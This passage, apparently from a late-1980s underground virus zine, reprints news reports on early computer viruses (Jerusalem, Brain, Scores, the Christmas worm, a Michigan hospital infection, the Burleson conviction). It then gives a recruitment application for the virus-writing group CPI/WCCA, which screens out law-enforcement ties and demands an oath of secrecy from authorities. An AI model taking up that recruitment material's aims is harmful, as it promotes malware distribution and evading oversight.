;-----------------------------------------------------------------------;
|
||
; ;
|
||
;-----------------------------------------------------------------------;
|
||
A7DF4 DB 27H,00H,8,2
|
||
|
||
COUNTER_1 DW 001CH
|
||
ALT_CTRL DW 0
|
||
A7DFC DB 27H,0,8,2
|
||
[2.10]
|
||
|
||
Virili In The News
|
||
------------------
|
||
This section deals with a large amount of stuff, basically, a bunch
|
||
of viruses and stuff that have been in the newspapers and magazines cuz
|
||
all of the damage they have done. Enjoy....
|
||
|
||
|
||
There's A Virus In My Software
|
||
|
||
Mischief-makers at the computer
|
||
are deliberately endangering data
|
||
|
||
By Philip J. Hilts
|
||
|
||
Washington Post Staff Writer
|
||
|
||
The Washington Post Weekly Edition, Page #38. May 23-29, 1988.
|
||
|
||
Tiny programs that are deliberately cause mischief are epidemic among
|
||
computers and causing nervousness among those who monitor them. Since the
|
||
first tests of the notion in 1983 that machines can catch and spread
|
||
"information diseases," the computer world has reached the point at which as
|
||
many as thirty instances of "computer virus" have been reported in the past
|
||
year, affecting tens of thousands of U.S. computers alone.
|
||
|
||
Such viruses have been found at the National Aeronautics and Space
|
||
Administration, International Business Machines Corporation, the House of
|
||
Representatives, at least six universities, several major computer networks
|
||
such as Comp-u-serve and several businesses, including the world's largest
|
||
computer-service company, the $4.4 billion Electronic Data Systems
|
||
Corporation of Dallas, Texas.
|
||
|
||
Written by malicious programmers, the viruses are sneaked into computer
|
||
systems by piggybacking them on legitimate programs and messages. There,
|
||
they may be passed along or instructed to wait until a prearranged moment to
|
||
burst forth and destroy data.
|
||
|
||
Hundreds of computers at the Hebrew University of Jerusalem and other
|
||
places in Israel were hit last fall by a virus designed to spread and then,
|
||
in one swipe on a Friday the thirteenth, destroy all data in any computer it
|
||
could reach.
|
||
|
||
If not for an error by it's author, who has not been caught, the virus
|
||
could have caused devastation among micro-computers in Israel and other
|
||
nations. The virus did not check to see whether it already had infected a
|
||
program and so infected some computers hundreds of times, crowding their
|
||
memories enough to call attention to itself.
|
||
|
||
In a seven-month campaign, programmers in Israel hastened to find
|
||
infected machines and ensure that the smallest number would be affected
|
||
before Friday, May 13th. Officials say they initially thought that the
|
||
infection was connected with the anniversary of the last day that Palestine
|
||
existed as a political entity but subsequently decided that it most likely
|
||
involved just Friday the thirteenth.
|
||
|
||
Apparently, the campaign was successful; there has been no word of
|
||
substantial damage. This past Friday the thirteenth is this year's only such
|
||
day.
|
||
|
||
At the Aldus Corporation of Seattle, Washington, a major software maker,
|
||
executives are huddling with lawyers to try to determine whether
|
||
international spread of such diseases is illegal. No virus cases have been
|
||
taken to court.
|
||
|
||
At N.A.S.A. headquarters in Washington, several hundred computers had to
|
||
be resuscitated after being infected. N.A.S.A. officials have taken
|
||
precautions and reminded their machines' users to follow routine computer
|
||
hygiene: Don't trust foreign data or strange machines.
|
||
|
||
Viruses have the eerie ability to perch disguised among legitimate data
|
||
just as biological viruses hide among genes in human cells, then spring out
|
||
unexpectedly, multiplying and causing damage. Experts say that even when
|
||
they try to study viruses in controlled conditions, the programs can get out
|
||
of control and erase everything in a computer. The viruses can be virtually
|
||
impossible to stop if their creators are determined enough.
|
||
|
||
"The only way to protect every-body from them is to do something much
|
||
worse than the viruses: Stop talking to one another with computers," says
|
||
William H. Murray, an information-security specialist at Ernst and Whinney
|
||
financial consultants in Hartford, Connecticut.
|
||
|
||
Hundreds of programs and files have been destroyed by viruses, and
|
||
thousands of hours of repair or prevention time have been logged.
|
||
Programmers have quickly produced antidote programs with such titles as
|
||
"Vaccine," "Flu Shot," "Data Physician," "Syringe."
|
||
|
||
Experts says known damage is minimal compared with the huge, destructive
|
||
potential. They express the hope that the attacks will persuade computer
|
||
users to minimize access to programming and data.
|
||
|
||
"What we are dealing with here is the fabric of trust in society," says
|
||
Murray. "With computer viruses, we have a big vulnerability."
|
||
|
||
Early this year, Aldus Corporation discovered that a virus had been
|
||
introduced that infected at least five-thousand copies of a new drawing
|
||
program called Freehand for the Macintosh computer. The infected copies were
|
||
packaged, sent to stores and sold. On March 2, the virus interrupted users
|
||
by flashing this message on their screens:
|
||
|
||
"Richard Brandow, publisher of MacMag, and its entire staff would like
|
||
to take this opportunity to convey their universal message of peace to all
|
||
Macintosh users around the world."
|
||
|
||
Viruses are the newest of evolving methods of computer mayhem, says
|
||
Donn B. Parker, a consultant at SRI International, a computer research firm
|
||
in Menlo Park, California. One is the "Trojan horse," a program that looks
|
||
and acts like a normal program but contains hidden commands that eventually
|
||
take effect, ordering mischief. Others include the "time bomb," which
|
||
explodes at a set time, and the "logic bomb," which goes off when the
|
||
computer arrives at a certain result during normal computation. The "salami
|
||
attack" executes barely noticeable results small acts, such as shaving a
|
||
penny from thousands of accounts.
|
||
|
||
The computer virus has the capability to command the computer to make
|
||
copies of the virus and spread them. A virus typically is written only as a
|
||
few hundred characters in a program containing tens of thousands of
|
||
characters. When the computer reads legitimate instructions, it encounters
|
||
the virus, which instructs the computer to suspend normal operations for a
|
||
fraction of a second.
|
||
|
||
During that time, the virus instructs the computer to check for other
|
||
copies of itself and, if none is found, to make and hide copies. Instruction
|
||
to commit damage may be included. A few infamous viruses found in the past
|
||
year include:
|
||
|
||
[] The "scores" virus. Named after a file it spawns, it recently entered
|
||
several hundred Macintosh computers at N.A.S.A. headquarters. "It looks
|
||
as if it searching for a particular Macintosh program with a name that
|
||
no one recognizes," spokesman Charles Redmond says.
|
||
|
||
This virus, still spreading, has reached computers in Congress'
|
||
information system at the National Oceanic and Atmospheric
|
||
Administration and at Apple Computer Incorporated's government-systems
|
||
office in Reston, Virginia. It has hit individuals, businesses and
|
||
computer "bulletin boards" where computer hobbyists share information.
|
||
It apparently originated in Dallas, Texas and has caused damage, but
|
||
seemingly only because of its clumsiness, not an instruction to do
|
||
damage.
|
||
|
||
[] The "brain" virus. Named by its authors, it was written by two brothers
|
||
in a computer store in Lahore, Pakistan, who put their names, addresses
|
||
and phone number in the virus. Like "scores," it has caused damage
|
||
inadvertently, ordering the computer to copy itself into space that
|
||
already contain information.
|
||
|
||
[] The "Christmas" virus. It struck last December after a West German
|
||
student sent friends a Christmas message through a local computer
|
||
network. The virus told the receiver's computer to display the
|
||
greeting, then secretly send the virus and message to everyone on the
|
||
recipient's regular electronic mailing list.
|
||
|
||
The student apparently had no idea that someone on the list had
|
||
special, restricted access to a major world-wide network of several
|
||
thousand computers run by I.B.M. The network broke down within hours
|
||
when the message began multiplying, stuffing the computers' memories.
|
||
No permanent damage was done, and I.B.M. says it has made repetition
|
||
impossible.
|
||
|
||
Demonstrations have shown that viruses can invade the screens of users
|
||
with the highest security classification, according to Fred Cohen of
|
||
Cincinnati, a researcher who coined the term "computer Viruses." A standard
|
||
computer-protection device at intelligence agencies, he says, denies giving
|
||
access by a person at one security level to files of anyone else at a higher
|
||
level and allows reading but denies writing of files of anyone lower.
|
||
|
||
This, however, "allows the least trusted user to write a program that
|
||
can be used by everyone" and is "very dangerous," he says.
|
||
|
||
Computers "are all at risk," says Cohen, "and will continue to be... not
|
||
just from computer viruses. But the viruses represent a new level of threat
|
||
because of their subtleness and persistence."
|
||
|
||
|
||
1.) Computer "viruses" are actually immature computer programs. Most are
|
||
written by malicious programmers intent on destroying information in
|
||
computers for fun.
|
||
|
||
2.) Those who write virus programs often conceal them on floppy disks that
|
||
are inserted in the computer. The disks contain all programs needed to
|
||
run the machine, such as word processing programs, drawing programs or
|
||
spread sheet programs.
|
||
|
||
3.) A malicious programmer makes the disk available to others, saying it
|
||
contains a useful program or game. These programs can be lent to others
|
||
or put onto computerized: "bulletin boards" where anyone can copy them
|
||
for personal use.
|
||
|
||
4.) A computer receiving the programs will "read" the disk and the tiny virus
|
||
program at the same time. The virus may then order the computer to do a
|
||
number of things:
|
||
|
||
A.) Tell it to read the virus and follow instructions.
|
||
|
||
B.) Tell it to make a copy of the virus and place it on any disk inserted
|
||
in the machine today.
|
||
|
||
C.) Tell it to check the computer's clock, and on a certain date destroy
|
||
information that tells it where data is stored on any disk: if an
|
||
operator has no way of retrieving information, it is destroyed.
|
||
|
||
D.) Tell it not to list the virus programs when the computer is asked for
|
||
an index of programs.
|
||
|
||
5.) In this way, the computer will copy the virus onto many disks--perhaps
|
||
all or nearly all the disks used in the infected machine. The virus may
|
||
also be passed over the telephone, when one computer sends or receives
|
||
data from another.
|
||
|
||
6.) Ultimately hundreds or thousands of people may have infected disks and
|
||
potential time bombs in their systems.
|
||
|
||
|
||
-----------------------------------------------
|
||
'Virus' infected hospital computers,
|
||
led to epidemic of software mix-ups
|
||
-----------------------------------------------
|
||
From the San Diego Tribune
|
||
March 23, 1989
|
||
|
||
|
||
BOSTON (UPI) -- A "virus" infected computers at three Michigan hospitals
|
||
last fall and disrupted patient diagnoses at two of the centers in what appears
|
||
to be the first such invasion of a medical computer, it was reported yesterday.
|
||
|
||
The infiltration did not harm any patients but delayed diagnoses by
|
||
shutting down computers, creating files of non-existent patients and garbling
|
||
names on patient records, which could have caused more serious problems, a
|
||
doctor said.
|
||
|
||
"It definitely did affect care in delaying things and it could have
|
||
affected care in terms of losing this information completely," said Dr. Jack
|
||
Juni, a staff physician at the William Beaumont Hospitals in Troy and Royal Oak,
|
||
Mich., two of the hospitals involved.
|
||
|
||
If patient information had been lost, the virus could have forced doctors
|
||
to repeat tests that involve exposing patients to radiation, Juni said
|
||
yesterday. The phony and garble files could have caused a mix-up in patient
|
||
diagnosis, he said.
|
||
|
||
"This was information we were using to base diagnoses on," said Juni, who
|
||
reported the case in a letter in The New England Journal of Medicine. "We were
|
||
lucky and caught it in time."
|
||
|
||
A computer virus is a set of instructions designed to reproduce and spread
|
||
from computer to computer. Some viruses do damage in the process, such as
|
||
destroying files or overloading computers.
|
||
|
||
Paul Pomes, a computer virus expert at the University of Illinois in
|
||
Champaign, said this was the first case he had heard of in which a virus had
|
||
disrupted a computer used for patient care or diagnosis in a hospital.
|
||
|
||
Such disruptions could become more common as personal computers are used
|
||
more widely in hospitals, Juni and Pomes said. More people know how to program
|
||
-- and therefore sabotage -- personal computers than the more specialized
|
||
computers that previously have been used, Pomes said.
|
||
|
||
The problem in Michigan surfaced when a computer used to display images
|
||
used to diagnose cancer and other diseases began to malfunction at the 250-bed
|
||
Troy hospital in August 1988.
|
||
|
||
In October, Juni discovered a virus in the computer in the Troy hospital.
|
||
The next day, Juni found the same virus in a similar computer in the 1,200-bed
|
||
Royal Oak facility, he said.
|
||
|
||
The virus apparently arrived in a program in a storage disk that was part
|
||
of the Troy computer system, he said. It probably was spread inadvertently to
|
||
the Royal Oak computer on a floppy disk used by a resident who worked at both
|
||
hospitals to write a research paper, he said.
|
||
|
||
The virus also spread to the desk-top computers at the University of
|
||
Michigan Medical Center in Ann Arbor, where it was discovered before it caused
|
||
problems.
|
||
|
||
|
||
"Prosecutor Wins Conviction In Computer Data Destruction"
|
||
|
||
September 21, 1988
|
||
|
||
|
||
Fort Worth, Texas (AP) - A former programmer has been convicted of planting
|
||
a computer "virus" in his employer's system that wiped out 168,000 records and
|
||
was activated like a timb bomb, doing its damage two days after he was fired.
|
||
|
||
Tarrant County Assistant District Attorney Davis McCown said he believes e
|
||
is the first prosecutor in the country to have someone convicted for destroying
|
||
computer records using a "virus."
|
||
|
||
"We've had people stealing through computers, but not this type of case,"
|
||
McCown said. "The basis for this offense is deletion."
|
||
|
||
"It's very rare that the people who spread the viruses are caught," said
|
||
John McAfee, chairman of the Computer Virus Industry Association in Santa Clara,
|
||
which helps educate the public about viruses and find ways to fight them.
|
||
|
||
"This is absolutely the first time" for a conviction, McAfee said.
|
||
|
||
"In the past, prosecutors have stayed away from this kind of case because
|
||
they're too hard to prove," McCown said yesterday. They have also been reluctant
|
||
because the victim doesn't want to let anyone know there has been a breach of
|
||
security."
|
||
|
||
Donald Gene Burleson, 40, was convicted of charges of harmful access to a
|
||
computer, a third-degree feloy that carries up to 10 years in prison and up to
|
||
$5,000 in fines.
|
||
|
||
A key to the case was the fact that State District Judge John Bradshaw
|
||
allowed the computer program that deleted the files to be introduced as
|
||
evidence, McCown said. It would have been difficult to get a conviction
|
||
otherwise, he said.
|
||
|
||
The District Court jury deliberated six hours before bringing back the
|
||
first conviction under the state's 3-year-old computer sabotage law.
|
||
|
||
Burleson planted the virus in revenge for his firing from an insurance
|
||
company, McCown said.
|
||
|
||
Jurors were told during a technical and sometimes-complicated three-week
|
||
trial that Burleson planted a rogue program in the computer system used to store
|
||
records at USPA and IRA Co., a Fort Worth-based insurance and brokerage firm.
|
||
|
||
A virus is a computer program, often hidden in apparently normal computer
|
||
software, that instructs the computer to change or destroy information at a
|
||
given time or after a certain sequence of commands.
|
||
|
||
The virus, McCown said, was activated Sept. 21, 1985, two days after
|
||
Burleson was fired as a computer programmer, because of alleged personality
|
||
conflicts with other employees.
|
||
|
||
"There were a series of programs built into the system as early as Labor
|
||
Day (1985)," McCown said. "Once he got fired, those programs went off."
|
||
|
||
The virus was discovered two days later, after it had eliminated 168,00
|
||
payroll records, holding up company paychecks for more than a month. The virus
|
||
could have caused hundreds of thousands of dollars in damage to the system had
|
||
it continued, McCown said.
|
||
WEST COAST CORRUPTED ALLEGIANCE PRESENTS:
|
||
|
||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||
|
||
>> CORRUPTED PROGRAMMING INTERNATIONAL <<
|
||
>> MEMBERSHIP APPLICATION <<
|
||
|
||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||
(CPI is a sub-group of WCCA)
|
||
|
||
NOTE: The following information is of a totally confidential nature. We must
|
||
question you in depth and thouroughly so that our knowledge and idea
|
||
of you will be quite complete. Remember, it is the fate of our voting
|
||
members who will decide upon your membership, as the result of your
|
||
response to this questionarre. Please answer the following completely
|
||
and to the best of your ability. Also note that we may decide to voice
|
||
validate you or gather any other information through other sources and
|
||
will discover if you have placed false or misleading information on
|
||
this application.
|
||
|
||
|
||
PERSONAL INFORMATION:
|
||
-----------------------------------------------------------------------------
|
||
Alias(es) You HAVE Used :
|
||
Alias(es) You Currently Use :
|
||
Your FULL REAL Name :
|
||
Your Voice Phone Number :(###)###-####
|
||
Your Data Phone Number :(###)###-####
|
||
Your Mailing Address :
|
||
Your City, State & Zip :
|
||
Your Age :
|
||
Occupation/Grade :
|
||
Place of Employment/School :
|
||
Work Phone Number :
|
||
Your Interests And Hobbies :
|
||
|
||
Are You IN ANY WAY Affiliated With ANY Governmental/Law Enforcement Agency?
|
||
If So, In What Way? (Such as FBI/Sheriff/Police/etc. YOU KNOW WHAT I MEAN)
|
||
:
|
||
:
|
||
|
||
Are You IN ANY WAY Affiliated With The Telephone Company Or Any Type Of Phone,
|
||
Data, Or Long Distance Type Of Company? If So, In What Way?
|
||
:
|
||
:
|
||
|
||
|
||
COMPUTER INFORMATION/EXPERIENCE
|
||
-----------------------------------------------------------------------------
|
||
Computer Experience (time) :
|
||
Modeming Experience (time) :
|
||
BBS's You Frequent (Name/#) :
|
||
Some Elite References :
|
||
Computers You Have Used :
|
||
Computer(s) You Are Using :
|
||
Computer You Prefer :
|
||
Languages You Have Tried :
|
||
Languages You Know Well :
|
||
Your Best Language :
|
||
Have You Ever Phreaked :
|
||
Do You Phreak Regularly :
|
||
Have You Ever Hacked :
|
||
Do You Hack Regularly :
|
||
Have You Ever Cracked :
|
||
Do You Crack Regularly :
|
||
Ever Made A Virus/Trojan :
|
||
Major Accomplishments :
|
||
:
|
||
|
||
INTERVIEW
|
||
-----------------------------------------------------------------------------
|
||
Answer In 4 Lines Or Less:
|
||
|
||
What do you think Corrupted Programming International is?
|
||
:
|
||
:
|
||
:
|
||
:
|
||
|
||
When did you first hear about CPI?
|
||
:
|
||
:
|
||
:
|
||
:
|
||
|
||
Why do you want to be a member of CPI?
|
||
:
|
||
:
|
||
:
|
||
:
|
||
|
||
Do you know any of the members of CPI? Can you name any or the founders of CPI?
|
||
:
|
||
:
|
||
:
|
||
:
|
||
|
||
Have you considered the distribuition of Viruses/Trojans as a "crime"? Why
|
||
or why not? Have you ever considered the consequences that could result
|
||
from the acts of releasing a Virus/Trojan? (morally speaking?)
|
||
:
|
||
:
|
||
:
|
||
:
|
||
|
||
Have you written any text files? (On any underground type of subject)
|
||
:
|
||
:
|
||
:
|
||
:
|
||
|
||
Are you a member of any other group(s)? Can you name them and their HQ BBS?
|
||
:
|
||
:
|
||
:
|
||
:
|
||
|
||
What would you consider yourself if you were admitted into CPI, a programmer,
|
||
a phreaker, a distributor, a information gatherer, or a vegetable?
|
||
:
|
||
:
|
||
:
|
||
:
|
||
|
||
Why would you ever want to release or aid in releasing a potential virus/trojan
|
||
to the public?
|
||
:
|
||
:
|
||
:
|
||
:
|
||
|
||
Can you contribute to CPI? How?
|
||
:(do you have access to info concerning virus/trojans)
|
||
:(exceptional programmer?)
|
||
:(got connections?)
|
||
:(anything extraordinary?)
|
||
|
||
|
||
OATH
|
||
-----------------------------------------------------------------------------
|
||
Typing your name at the bottom of the following paragraph is the same as
|
||
signing your name on an official document.
|
||
|
||
authorities - As stated in the document below, the term authorities shall
|
||
be defined as any law enforcement agency or any agency that
|
||
is/may be affiliated with any law enforcement agency. Also,
|
||
this includes any company or agency or person which is/may
|
||
be involved with the telephone company or any telephone-type
|
||
of service(s).
|
||
|
||
I [your name here] do solemnly swear never to report neither to my peers nor
|
||
the authorities the actions and duties performed by this group, Corrupted
|
||
Programming International, on any account. Also, I realize that if I leave
|
||
CPI and am no longer a member of CPI, it is my duty, as signed below, to uphold
|
||
the greatest confidence of CPI's activities, and I agree that any information I
|
||
may report to any one or any thing CANNOT be used against CPI and its members
|
||
in a court of law. I fully understand that if I were to become affiliated with
|
||
the authorities that it would be my duty to remove myself from any membership
|
||
if my position presented itself as contradictory towards the group, CPI and its
|
||
members. I also comprehend that if I were to be confronted by the authorities,
|
||
it my duty as a CPI member, as signed below, is to never disclose or discuss
|
||
CPI's activities to them; however, if I do, I fully agree that the information
|
||
disclosed or discussed cannot then be used against CPI or any member(s) of CPI
|
||
in a court of law. I further agree that all the terms and restrictions as noted
|
||
above also correspond to the entire group of WCCA, West Coast Corrupted
|
||
Allegiance.
|
||
|
||
Typed:____________________
|
||
|
||
|
||
-----------------------------------------------------------------------------
|
||
.Answer Each Question To The Best And Fullest Of Your Ability.
|
||
-----------------------------------------------------------------------------
|
||
|
||
Upload ALL Applications To The WCCA Headquarters BBS
|
||
|
||
T H E A N D R O M E D A S T R A I N
|
||
|
||
Future WCCA Support BBS's Will Be Active - Applications May Be Turned In Then
|
||
|